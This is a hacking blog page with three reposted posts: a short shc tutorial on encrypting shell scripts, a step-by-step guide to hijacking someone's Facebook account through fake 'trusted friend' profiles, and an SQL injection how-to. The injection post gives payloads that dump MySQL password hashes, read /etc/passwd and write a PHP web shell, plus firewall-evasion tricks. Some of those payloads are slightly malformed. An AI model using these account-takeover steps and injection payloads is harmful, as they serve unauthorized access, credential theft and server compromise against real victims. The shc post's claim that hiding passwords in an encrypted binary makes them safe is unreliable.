Nov 2, 2011

Creating executable of Shell Script

Many times it happen that shell scripts that we write contains sensitive information like password or some sort of keys or path to some sensitive files and if you running such script it become very easy for the normal user to have a look inside the script and get the sensitive information from the code.
There is a program called "shc" which can provide the protection from such cases that developer wants.

shc itself is not a compiler such as cc, it rather encodes and encrypts a shell script and generates C source code with the added expiration capability. It then uses the system compiler to compile a stripped binary which behaves exactly like the original script. Upon execution, the compiled binary will decrypt and execute the code with the shell -c option. Unfortunatelly, it will not give you any speed improvement as a real C program would.


shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.


Download shc (
here) and untar it:
tar -xzvf shc-X.X.tgz
cd shc-X.X/

make

make install
This will install the shc binary on your box.

Create a file called:
script.sh and add the following contents for testing purpose

############################### script.sh ##############################

#!/bin/sh

echo "This is a test shell script by Nikesh"

############################### script.sh ##############################


Now run the command:

shc -f script.sh


The switch "-f" specifies the source script to encrypt. The above command will create two files: script.sh.x.c and script.sh.x. The encrypted shell script is:
script.sh.x. Run that binary and see the output:

./script.sh.x

This is a test shell script by Nikesh

Now you can distibute the script.sh.x without any fear

You can also specify a time limit on the shell script so that it will no longer execute after a certain date (
expire) and you can specify a custom message to echo back to the user.

shc -e 09/12/2008 -m "Licence expire, please contact author - Nikesh" -f script.sh

./script.sh.x

./script.sh.x has expired!

Licence expire, please contact author - Nikesh


Check out the
man pages for more info on "shc". 

Source: http://linuxpoison.blogspot.com/2008/12/creating-executable-of-shell-script.html#.TrB6FyLU-4c.twitter

If you like my blog, Please Donate Me

Exploiting “Facebook Trusted Friend” Security Feature

In Facebook’s case, the keys are codes, and the user can choose from three to five “Trusted friends” who are then provided with a code. If you ever get locked out of your account (and you can’t access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to gain access to it again.  This method is used by hackers to hack most of the Facebook account using little bit of Social Engineering. How to hack using this feature ? 

For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.
After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password ?

2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.


3. After entering everything check it again and click on submit.


4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying
No Longer Access to These
click that one.

5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.

6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5 That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Source: http://blog.kaffenews.com/?p=2299


If you like my blog, Please Donate Me

Oct 30, 2011

Howto: Basic Step Of SQL Injections

In each step, I will take two part, the first part is the request that was make by attacker, the second is query string that target.com used to get the data from database and highlight in the second are texts that make by attacker.

1. Find the vulnerability parameter with any special character or ', "

Request

target.com/users.php?userid='

Query String
select name, nickname from users where user_id='''

So if you received error message from website, it could be the vulnerability for attack.

2. Try another test with '1' or '1'='1' or '1' and '1'='1' and '1' and '1'='2'


Request
target.com/users.php?userid=1' or '1'='1


Query String
select name,nickname from users where user_id='1' or '1'='1'

If you receive the results more than 1, the user_id is the vulnerability.




Request
target.com/users.php?userid=1 and 1=1

Query String
select name,nickname from users where user_id='1' and '1'='1'

Request
target.com/users.php?userid=1 and 1=2

Query String
select name,nickname from users where user_id='1' and '1'='2'

When you use '1' and '1'='1' and get the normal result. if you use '1' and '1'='2' and don't get any result, the user_id parameter are the vulnerability.


3. In this step, we will find how many columns that returned by the original query with ORDER BY

Request
target.com/users.php?userid=1 ORDER BY 1;#

Query String
select name,nickname from users where user_id='1' ORDER BY 1;#'



If you get nothing, try next with 2,3,4,5,... if you try with 8 and get error messages, the columns that returned by original query are 7

So now we know the returned column are 7, we must select with 7 column to return in each step.


You can try this step with '1' UNION SELECT 1;#' too.


Request
target.com/users.php?userid=1' UNION SELECT 1;#

Query String
select name,nickname from users where user_id='1' UNION SELECT 1;#'

So with this '1' UNION SELECT 1;#', if the return column is one column, you will get the results. if not, you will get nothing.


4. You can try to get column name with '1' OR testing IS NULL;#'


Request
target.com/users.php?userid=1' OR testing IS NULL;#

Query String
select name,nickname from users where user_id='1' OR testing IS NULL;#'

If you get the error or nothing, it makes me know that there don't have column name 'testing'. So you can brute force to get column name with this state.


5. After the step 4, I get one of all column name is 'name', I will find name value with LIKE. With LIKE you can guessing or get information of name.

Request
target.com/users.php?userid=1' OR name LIKE %D%';#

Query String
select name,nickname from users where user_id='1' OR name LIKE %D%';#'

The % is the wild character and _ represents any single character for LIKE command. This request mean we will query any name there are *D*. So if we lucky you will get the record that has name *D* like as Dan, Jodan, Jedt, etc.

You can try with another query like this.
1' OR name LIKE '_';#
1' OR name LIKE '____';#
1' OR name LIKE 'D%';#

6. This step we will find table name with 1' AND 1=(SELECT COUNT(*) FROM tablenames);#

Request
target.com/users.php?userid=1' AND 1=(SELECT COUNT(*) FROM tablenames);#

Query String
select name,nickname from users where user_id=1' AND 1=(SELECT COUNT(*) FROM tablenames);#

This will brute force to find table name in the database.

7. This step we will find the table name again but in the information_schema table. The information_schema keep the data about databases, tables, users and etc.

the information_schema.tables are the list of database names.
table_schema are the database names of list
table_name are the table names of list


Request
target.com/users.php?userid=1' UNION SELECT 1,1,1,1,1,table_schema, table_name FROM information_schema.tables;#

Query String
select name,nickname from users where user_id=1' UNION SELECT 1,1,1,1,1,table_schema, table_name FROM information_schema.tables;#


This query will get all database names and table names in the databases out to the page.

8. If you want to find version of SQL, use @@version to get it.


Request
target.com/users.php?userid=1' UNION SELECT 1,1,1,1,1,1,@@version;#

Query String
select name, nickname from users where user_id=1' UNION SELECT 1,1,1,1,1,1,@@version;#'


9. If you want to find user of the database and use this database, use system_user() and user() to get it.


Request
target.com/users.php?userid=1' UNION SELECT 1,1,1,1,1,system_user(),user();#

Query String
select name, nickname from users where user_id='1' UNION SELECT 1,1,1,1,1,system_user(),user();#'


10. Try to list password hashes of database with '1' UNION ALL SELECT 1,1,1,1,1,user,password FROM mysql.user; --priv;#'


Request
target.com/users.php?userid=1' UNION SELECT 1' UNION ALL SELECT 1,1,1,1,1,user,password FROM mysql.user; --priv;#

Query String
select name, nickname from users where user_id='1' UNION ALL SELECT 1,1,1,1,1,user,password FROM mysql.user; --priv;#'


11. You can load internal file of server with 1' UNION ALL SELECT load_file('/etc/passwd'),'1


Request
target.com/users.php?userid=1' UNION ALL SELECT load_file('/etc/passwd'),'1


Query String
select name, nickname from users where user_id='1' UNION ALL SELECT load_file('/etc/passwd'),'1'

12. You can create the php shell in the server with  1' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'phpshell.php';#


Request
target.com/users.php?userid=1' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'phpshell.php';#


Query String
select name, nickname from users where user_id='1' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'phpshell.php';#'


After create complete you can command it with phpshell.php?cmd=dir.


Evasion Technique.
This part is for evade the some Web Application Firewall.

Normal Attack.
union select from users where day='tomorrow'

Evading
union select from users where day=REVERSE('worromot')
union select from users where day=0x746f6d6f72726f77
union select from users where day LIKE '0x746f6d6f72726f77'
union select from users where day BETWEEN '0x746f6d6f72726f77' AND '0x746f6d6f72726f77'
union/**/select/**/from/**/users/**/where/**/day='tomorrow'

If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |